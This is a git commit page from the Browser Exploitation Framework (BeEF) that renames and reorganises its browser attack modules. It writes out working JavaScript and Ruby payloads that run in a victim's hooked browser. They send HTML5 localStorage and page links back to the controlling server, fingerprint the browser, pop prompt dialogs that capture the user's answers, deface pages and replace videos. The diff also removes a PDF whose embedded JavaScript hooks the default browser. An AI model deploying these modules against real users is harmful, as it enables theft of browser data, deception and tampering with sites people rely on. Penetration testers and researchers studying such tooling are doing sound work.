Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

command modules re-organised and re-named

Browse Source 
git-svn-id: https://beef.googlecode.com/svn/trunk@1292 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
wade@bindshell.net
2011-09-16 12:28:14 +00:00
parent 9127bbeb88
commit e97104f696
69 changed files with 41 additions and 41 deletions
Download Patch File Download Diff File Expand all files Collapse all files

20
modules/browser/alert_dialog/command.js Normal file
View File

@@ -0,0 +1,20 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
alert("<%== format_multiline(@text) %>");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "text=<%== format_multiline(@text) %>");
});

11
modules/browser/hook_default/config.yaml → modules/browser/alert_dialog/config.yaml
View File

@@ -15,12 +15,11 @@
#
beef:
module:
hook_ie:
alert_dialog:
enable: true
category: "Browser"
name: "Hook Default Browser"
description: "This module will use a PDF to attempt to hook the default browser (assuming it isn't currently hooked). <br><br>Normally, this will be IE but it will also work when Chrome is set to the default. When executed, the hooked browser will load a PDF and use that to start the default browser. If successful another browser will appear in the browser tree."
authors: ["saafan"]
name: "Create Alert Dialog"
description: "Sends an alert dialog to the hooked browser."
authors: ["wade", "bm"]
target:
working: ["All"]
user_notify: ["FF", "C"]
user_notify: ["All"]

36
modules/browser/alert_dialog/module.rb Normal file
View File

@@ -0,0 +1,36 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Alert_dialog < BeEF::Core::Command
# set and return all options for this module
def self.options
return [{
'name' => 'text',
'description' => 'Sends an alert dialog to the victim',
'type' => 'textarea',
'ui_label' => 'Alert text',
'value' => 'BeEF Alert Dialog',
'width' => '400px'
}]
end
def post_execute
content = {}
content['User Response'] = "The user clicked the 'OK' button when presented with an alert box."
save content
end
end

58
modules/browser/browser_fingerprinting/command.js Normal file
View File

@@ -0,0 +1,58 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var browser_type = new Array;
var browser_version = new Array;
var dom = document.createElement('b');
Array.prototype.unique = function() {
var o = {}, i, l = this.length, r = [];
for(i=0; i<l;i+=1) o[this[i]] = this[i];
for(i in o) r.push(o[i]);
return r;
};
parse_browser_details = function() {
if (!browser_type.length) browser_type[0] = "unknown";
if (!browser_version.length) browser_version[0] = "unknown";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "browser_type="+browser_type.unique()+"&browser_version="+browser_version.unique());
};
// Browser fingerprints // in the form of: "URI","Browser","version(s)"
var fingerprints = new Array(
new Array("Firefox","moz-icon://.autoreg?size=16"),
new Array("Firefox","2.x","resource:///res/html/gopher-audio.gif"),
new Array("Firefox","2.x-3.x","jar:resource:///chrome/classic.jar!/skin/classic/browser/Secure.png"),
new Array("Firefox","4.x-5.x","resource:///chrome/browser/skin/classic/browser/Secure.png"),
new Array("Firefox","4+","resource:///chrome/browser/skin/classic/browser/Geolocation-16.png"),
new Array("Internet Explorer","5.x-6.x","res://shdoclc.dll/pagerror.gif"),
new Array("Internet Explorer","7+","res://ieframe.dll/info_48.png")
);
for (var i=0; i<fingerprints.length; i++) {
var img = new Image;
img.id = fingerprints[i][0];
img.name = fingerprints[i][1];
img.src = fingerprints[i][2];
img.onload = function() { browser_type.push(this.id); browser_version.push(this.name); dom.removeChild(this); }
dom.appendChild(img);
}
setTimeout('parse_browser_details();', 2000);
});

26
modules/browser/browser_fingerprinting/config.yaml Normal file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
browser_fingerprinting:
enable: true
category: "Browser"
name: "Fingerprint Browser"
description: "This module attempts to fingerprint the browser type and version using URI handlers unique to Internet Explorer and Mozilla Firefox. This method does not rely on JavaScript objects which may have been modified by the user or browser compatibility mode."
authors: ["bcoles"]
target:
working: ["IE", "FF"]
not_working: ["ALL"]

31
modules/browser/browser_fingerprinting/module.rb Normal file
View File

@@ -0,0 +1,31 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Uses methods described here:
# http://www.itsecuritysolutions.org/2010-03-29_fingerprinting_browsers_using_protocol_handlers/
class Browser_fingerprinting < BeEF::Core::Command
def post_execute
content = {}
content['browser_type'] = @datastore['browser_type'] if not @datastore['browser_type'].nil?
content['browser_version'] = @datastore['browser_version'] if not @datastore['browser_version'].nil?
if content.empty?
content['fail'] = 'Failed to fingerprint browser.'
end
save content
end
end

13
modules/browser/hook_default/command.js → modules/browser/collect_links/command.js
View File

@@ -13,10 +13,9 @@
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var pdf_url = 'http://'+beef.net.host+ ':' + beef.net.port + '/report.pdf';
window.open( pdf_url, '_blank');
beef.net.send('<%= @command_url %>', <%= @command_id %>, "Attempted to open PDF in default browser.");
});
beef.execute(function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, beef.dom.getLinks());
});

25
modules/browser/collect_links/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
collect_links:
enable: true
category: "Browser"
name: "Get Page HREFs"
description: "This module will retrieve HREFs from the target page."
authors: ["vo"]
target:
working: ["ALL"]

25
modules/browser/collect_links/module.rb Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Collect_links < BeEF::Core::Command
def post_execute
content = {}
content['Links'] = @datastore['links']
save content
end
end

20
modules/browser/deface_web_page/command.js Normal file
View File

@@ -0,0 +1,20 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
document.body.innerHTML = "<%= @deface_content %>";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Deface Succesfull");
});

25
modules/browser/deface_web_page/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
deface_web_page:
enable: true
category: "Browser"
name: "Replace Content (Deface)"
description: "Overwrite the body of the page the hooked browser is on with the 'Deface Content' string."
authors: ["antisnatchor"]
target:
user_notify: ['ALL']

31
modules/browser/deface_web_page/module.rb Normal file
View File

@@ -0,0 +1,31 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Deface_web_page < BeEF::Core::Command
def self.options
return [
{ 'name' => 'deface_content', 'description' => 'Your defacement content', 'ui_label'=>'Deface Content', 'type' => 'textarea', 'value' =>'BeEF!', 'width' => '400px', 'height' => '100px' }
]
end
def post_execute
content = {}
content['Result'] = @datastore['result']
save content
end
end

2
modules/browser/detect_visited_urls/config.yaml
View File

@@ -18,7 +18,7 @@ beef:
detect_visited_urls:
enable: true
category: "Browser"
name: "Detect Visited URLs"
name: "Get Visited URLs"
description: "This module will detect whether or not the hooked browser has visited the specified URL(s)"
authors: ["passbe"]
target:

20
modules/browser/extract_local_storage/command.js Normal file
View File

@@ -0,0 +1,20 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
if ('localStorage' in window && window['localStorage'] !== null) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "localStorage="+JSON.stringify(window['localStorage']));
} else beef.net.send("<%= @command_url %>", <%= @command_id %>, "localStorage="+JSON.stringify("HTML5 localStorage is null or not supported."));
});

25
modules/browser/extract_local_storage/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
extract_local_storage:
enable: true
category: "Browser"
name: "Get Local Storage"
description: "Extracts data from the HTML5 localStorage object."
authors: ["bcoles"]
target:
working: ["FF", "S", "C"]

29
modules/browser/extract_local_storage/module.rb Normal file
View File

@@ -0,0 +1,29 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Extract_local_storage < BeEF::Core::Command
# More info:
# http://dev.w3.org/html5/webstorage/
# http://diveintohtml5.org/storage.html
#
def post_execute
content = {}
content['localStorage'] = @datastore['localStorage']
save content
end
end

79
modules/browser/hook_default/bounce_to_ie.pdf
View File

@@ -1,79 +0,0 @@
%PDF-1.1
1 0 obj
<<
/Pages 3 0 R
/OpenAction 4 0 R
/Type /Catalog
>>
endobj
2 0 obj
<<
/Encoding /MacRomanEncoding
/Subtype /Type1
/BaseFont /Helvetica
/Type /Font
/Name /F1
>>
endobj
3 0 obj
<<
/Kids [ 5 0 R ]
/Type /Pages
/Count 1
>>
endobj
4 0 obj
<<
/S /JavaScript
/JS 6 0 R
>>
endobj
5 0 obj
<<
/MediaBox [ 0 0 795 842 ]
/Contents 7 0 R
/Parent 3 0 R
/Resources <<
/Font <<
/F1 2 0 R
>>
/ProcSet [ /PDF /Text ]
>>
/Type /Page
>>
endobj
6 0 obj
<<
/Length 1708
>>stream
app.launchURL("<hookURI>",true);
endstream
endobj
7 0 obj
<<
/Length 48
>>stream
BT
ET
endstream
endobj
xref
0 8
0000000000 65535 f
0000000010 00000 n
0000000087 00000 n
0000000209 00000 n
0000000278 00000 n
0000000332 00000 n
0000000513 00000 n
0000002278 00000 n
trailer
<<
/Size 8
/ID [ (11f570958af49b794c95ff1c6be3bac5) (11f570958af49b794c95ff1c6be3bac5) ]
/Root 1 0 R
>>
startxref
2381
%%EOF

58
modules/browser/hook_default/module.rb
View File

@@ -1,58 +0,0 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Hook_ie < BeEF::Core::Command
def pre_send
#Get the servers configurations.
configuration = BeEF::Core::Configuration.instance
#The hook url to be replace the token in the original pdf file.
hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/report.html"
# A new pdf file containg the actual hook URI instead of the dummy token.
configured_hook_file = File.open("./modules/browser/hook_default/bounce_to_ie_configured.pdf","w")
# The original pdf file contains a token that will get replaced during the initialization with
# the actual hook URI of beef. Note that the hook URI is accessed via the DNS name.
File.open('./modules/browser/hook_default/bounce_to_ie.pdf',"r") { |original_hook_file|
original_hook_file.each_line { |line|
# If the line includes the hook token, then replace it with the actual hook URI
if(line.include? '<hookURI>')
line = line.sub(/<hookURI>/, hook_uri)
end
#write the line to a new file
configured_hook_file.write(line)
}
}
configured_hook_file.close()
#Bind the configured PDF file to the web server.
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/hook_default/bounce_to_ie_configured.pdf', '/report', 'pdf', -1);
end
def post_execute
content = {}
content['result'] = @datastore['result']
save content
#update_zombie!
end
end

2
modules/browser/link_rewrite/config.yaml
View File

@@ -18,7 +18,7 @@ beef:
link_rewrite:
enable: true
category: "Browser"
name: "Link Rewriter"
name: "Replace HREFs"
description: "This module will rewrite all the href attributes of all matched links.<br /><br />The jQuery selector field can be used to limit the selection of links. eg: a[href=\"http://www.bindshell.net\"]. For more information please see: http://api.jquery.com/category/selectors/"
authors: ["passbe"]
target:

20
modules/browser/prompt_dialog/command.js Normal file
View File

@@ -0,0 +1,20 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var answer = prompt("<%== @question %>","")
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);
});

25
modules/browser/prompt_dialog/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
prompt_dialog:
enable: true
category: "Browser"
name: "Create Prompt Dialog"
description: "Sends a prompt dialog to the hooked browser."
authors: ["wade", "bm"]
target:
user_notify: ['ALL']

35
modules/browser/prompt_dialog/module.rb Normal file
View File

@@ -0,0 +1,35 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Prompt_dialog < BeEF::Core::Command
def self.options
return [
{'name' =>'question', 'description' =>'Prompt text', 'ui_label'=>'Prompt text'}
]
end
#
# This method is being called when a zombie sends some
# data back to the framework.
#
def post_execute
# return if @datastore['answer']==''
save({'answer' => @datastore['answer']})
end
end

23
modules/browser/replace_video/command.js Normal file
View File

@@ -0,0 +1,23 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
$j('<%= @jquery_selector %>').each(function(){
var width = $j(this).css('width');
var height = $j(this).css('height');
$j(this).replaceWith('<embed src="http://www.youtube.com/v/<%= @youtube_id %>?fs=1&amp;hl=en_US&amp;autoplay=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="' + width + '" height="' + height + '">');
});
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Replace Video Succesfull");
});

25
modules/browser/replace_video/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
replace_video:
enable: true
category: "Browser"
name: "Replace Videos"
description: "Replaces an object selected with jQuery (all embed tags by default) with an embed tag containing the youtube video of your choice (rickroll by default)."
authors: ["Yori Kvitchko", "antisnatchor"]
target:
user_notify: ['ALL']

32
modules/browser/replace_video/module.rb Normal file
View File

@@ -0,0 +1,32 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Replace_video < BeEF::Core::Command
def self.options
return [
{'name' => 'youtube_id', 'ui_label' => 'YouTube Video ID', 'value' => 'XZ5TajZYW6Y', 'width'=>'150px'},
{'name' => 'jquery_selector', 'ui_label' => 'jQuery Selector', 'value' => 'embed', 'width'=>'150px'}
]
end
def post_execute
content = {}
content['Result'] = @datastore['result']
save content
end
end

25
modules/browser/rickroll/command.js Normal file
View File

@@ -0,0 +1,25 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
$j('body').html('');
$j('body').css({'padding':'0px', 'margin':'0px', 'height':'100%'});
$j('html').css({'padding':'0px', 'margin':'0px', 'height':'100%'});
$j('body').html('<object width="100%" height="100%"><param name="movie" value="http://www.youtube.com/v/XZ5TajZYW6Y?fs=1&amp;hl=en_US&amp;autoplay=1&amp;iv_load_policy=3"><param name="allowFullScreen" value="true"><param name="allowscriptaccess" value="always"><embed src="http://www.youtube.com/v/XZ5TajZYW6Y?fs=1&amp;hl=en_US&amp;autoplay=1&amp;iv_load_policy=3" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="100%" height="100%"></object>');
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Rickroll Succesfull");
});

25
modules/browser/rickroll/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
rickroll:
enable: true
category: "Browser"
name: "Redirect Browser (Rickroll)"
description: "Overwrite the body of the page the victim is on with a full screen Rickroll."
authors: ["Yori Kvitchko"]
target:
user_notify: ['ALL']

25
modules/browser/rickroll/module.rb Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Rickroll < BeEF::Core::Command
def post_execute
content = {}
content['Result'] = @datastore['result']
save content
end
end

2
modules/browser/site_redirect/config.yaml
View File

@@ -18,7 +18,7 @@ beef:
site_redirect:
enable: true
category: "Browser"
name: "Site Redirect"
name: "Redirect Browser"
description: "This module will redirect the selected hooked browser to the address specified in the 'Redirect URL' input."
authors: ["wade", "vo"]
target:

2
modules/browser/site_redirect_iframe/config.yaml
View File

@@ -18,7 +18,7 @@ beef:
site_redirect_iframe:
enable: true
category: "Browser"
name: "Site Redirect (iframe)"
name: "Redirect Browser (iFrame)"
description: "This module creates a 100% x 100% overlaying iframe and keeps the browers hooked to the framework. The content of the iframe, page title and the time delay are specified in the parameters below.<br><br>The content of the URL bar will not be changed in the hooked browser."
authors: ["ethicalhack3r", "Yori Kvitchko"]
target: